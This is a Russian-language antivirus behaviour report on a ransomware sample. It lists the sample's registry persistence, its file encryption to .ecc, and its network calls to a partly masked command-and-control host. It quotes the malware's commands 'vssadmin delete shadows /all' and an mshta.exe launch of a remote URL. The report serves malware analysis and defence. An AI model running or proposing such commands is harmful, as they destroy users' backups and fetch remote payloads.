Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'crypto13' = '%APPDATA%\etuyafl.exe'
Вредоносные функции:
Создает и запускает на исполнение:
- '%APPDATA%\etuyafl.exe'
Запускает на исполнение:
- '<SYSTEM32>\mshta.exe' "http://50.#.138.132/?Su#######################################################################################################"
- '<SYSTEM32>\vssadmin.exe' delete shadows /all
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\cmd.exe
следующие пользовательские процессы:
- ecmd.exe
Изменения в файловой системе:
Создает следующие файлы:
- %APPDATA%\log.html
- %APPDATA%\key.dat
- %APPDATA%\etuyafl.exe
Перемещает следующие системные файлы:
- %WINDIR%\$NtUninstallWIC$\spuninst\spuninst.txt в %WINDIR%\$NtUninstallWIC$\spuninst\spuninst.txt.ecc
- %WINDIR%\$NtUninstallKB942288-v3$\spuninst\spuninst.txt в %WINDIR%\$NtUninstallKB942288-v3$\spuninst\spuninst.txt.ecc
Самоудаляется.
Сетевая активность:
Подключается к:
- '50.#.138.132':80
- '7t######47vlep5o.2kjb7.net':80
- 'localhost':1038
TCP:
Запросы HTTP GET:
- 50.#.138.132/?Su#######################################################################################################
- 7t######47vlep5o.2kjb7.net/state.php?U3######################################################################################################################################################################################################################################################################
UDP:
- DNS ASK 7t######47vlep5o.2kjb7.net
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'Indicator' WindowName: ''
